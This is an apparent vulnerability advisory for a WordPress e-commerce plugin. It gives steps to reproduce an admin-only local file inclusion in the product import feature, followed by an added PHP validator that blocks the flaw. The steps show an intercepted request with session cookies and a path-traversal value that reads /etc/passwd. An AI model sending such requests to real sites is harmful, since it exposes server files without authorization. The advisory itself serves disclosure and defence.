wpexploit | Shreya Pohekar | WPEX-ID: 229B93CD-544B-4877-8D9F-E6DEBDA9511C
History: Mar 13, 2023 - 12:00 a.m.

Shopping Cart & eCommerce Store < 5.4.3 - Admin+ LFI

2023-03-13 00:00:00
Shreya Pohekar

Tags: admin login, lfi vulnerability, ecommerce store, import products, intercept request, cookie, admin-ajax.php, import_file_url, exploit

EPSS: 0.001 (Low), Percentile: 36.7%

The plugin does not validate the file URL supplied in HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.

1. Login as Admin.
2. Go to `wp-admin/admin.php?page=wp-easycart-products&subpage=products`
3. Click on Import Products. Browse any file and click on import file. Intercept the request. It will contain the following:
```
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1675522971%; PHPSESSID=qp0lnu3uc71tv3hl6jcgsknnjd; wpeasycart_admin_perpage=25
action=ec_admin_ajax_import_products&import_file_url=http%3A%2F%2F127.0.0.1%2Fwp-content%2Fuploads%2F2023%2F02%2Fresume_xss.png&wp_easycart_nonce=fd850a701e
```
4. Change the value of `import_file_url` to a file (ex: `/../../../../../etc/passwd`)
5. Send the request and you will see that the contents of `/etc/passwd` are obtained

Note: only the first line is obtained in the response.
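As an added defensive illustration (this is not the plugin's own code, which the advisory does not show), the check below refuses an `import_file_url` value that is not a remote HTTP(S) URL before anything tries to read it. The function name `validate_import_file_url` and the sample inputs are assumptions constructed for the example.

```php
<?php
// Added example, not the plugin's code: accept only a remote http/https URL as
// the import source, so a bare local path or a non-HTTP scheme never reaches a
// file reader. Function name and sample inputs are assumptions.
function validate_import_file_url(string $url): bool
{
    // Must be a syntactically valid absolute URL; a bare path such as
    // "/../../../../../etc/passwd" already fails here.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    // Only http and https are fetchable sources; file://, php://, data: are refused.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Refuse traversal segments in the path, including percent-encoded ones.
    $path = rawurldecode($parts['path'] ?? '');
    foreach (explode('/', $path) as $segment) {
        if ($segment === '..') {
            return false;
        }
    }
    return true;
}

// Constructed inputs for a quick self-check: php validate.php
$samples = [
    'http://127.0.0.1/wp-content/uploads/2023/02/resume_xss.png', // remote URL: allowed
    '/../../../../../etc/passwd',                               // local path: rejected
    'file:///etc/passwd',                                        // non-HTTP scheme: rejected
    'http://example.com/uploads/..%2F..%2Fetc/passwd',           // encoded traversal: rejected
];
foreach ($samples as $s) {
    printf("%-60s %s\n", $s, validate_import_file_url($s) ? 'allowed' : 'rejected');
}
```

In a WordPress plugin the accepted URL should then be fetched through `wp_safe_remote_get()` rather than passed to a local file read, and `wp_http_validate_url()` can be applied first: it also rejects loopback and private addresses unless the `http_request_host_is_external` filter allows them, which this standalone check does not do.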
